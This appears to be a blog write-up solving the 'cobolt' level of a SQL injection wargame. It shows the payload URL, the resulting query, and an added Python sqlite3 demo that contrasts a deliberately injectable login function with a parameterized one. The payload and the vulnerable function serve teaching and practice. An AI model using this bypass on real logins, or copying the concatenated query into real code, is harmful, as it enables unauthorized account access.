Lord Of SQL injection [ 2.Cobolt ]

2017. 9. 8. 18:43

 




URL: https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin&pw=1234' or id='admin' %23

=> SELECT id FROM prob_cobolt WHERE ( id='admin' and pw='hash value' ) or id='admin' #')

=> The trailing condition id='admin' is satisfied regardless of the pw comparison, so the query executes.
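
The grouping shown above, reproduced as an added example (not code from the original post or from the challenge), with the string-built query beside a parameterized one. Assumptions: Python's sqlite3 stands in for the challenge database, so the `#` comment from the URL is written as `-- `; the table rows, the function names and the plain `pw` comparison (hashing omitted) are constructed for illustration.

```python
import sqlite3

# Same value as the pw parameter in the URL above, with '#' swapped for
# SQLite's '-- ' line comment (assumption: SQLite instead of the real backend).
PAGE_PW = "1234' or id='admin' -- "


def make_db():
    """Constructed stand-in for prob_cobolt; pw values are placeholders."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE prob_cobolt (id TEXT, pw TEXT)")
    db.executemany(
        "INSERT INTO prob_cobolt VALUES (?, ?)",
        [("admin", "stored-hash-placeholder"), ("guest", "guest-hash-placeholder")],
    )
    return db


def login_concat(db, user_id, pw):
    """Vulnerable form: input is pasted into the SQL text.

    A quote inside pw closes the string literal, and because AND binds
    tighter than OR the WHERE clause is evaluated as
    (id=... and pw=...) or id='admin'.
    """
    query = f"SELECT id FROM prob_cobolt WHERE id='{user_id}' and pw='{pw}'"
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_param(db, user_id, pw):
    """Hardened form: placeholders keep both inputs as data, never as SQL."""
    row = db.execute(
        "SELECT id FROM prob_cobolt WHERE id=? and pw=?", (user_id, pw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("concat, wrong pw      :", login_concat(db, "admin", "wrong"))
    print("concat, page's pw     :", login_concat(db, "admin", PAGE_PW))
    # The OR branch matches on its own, whatever id was supplied.
    print("concat, id=guest      :", login_concat(db, "guest", PAGE_PW))
    print("parameterized, same pw:", login_param(db, "admin", PAGE_PW))
```
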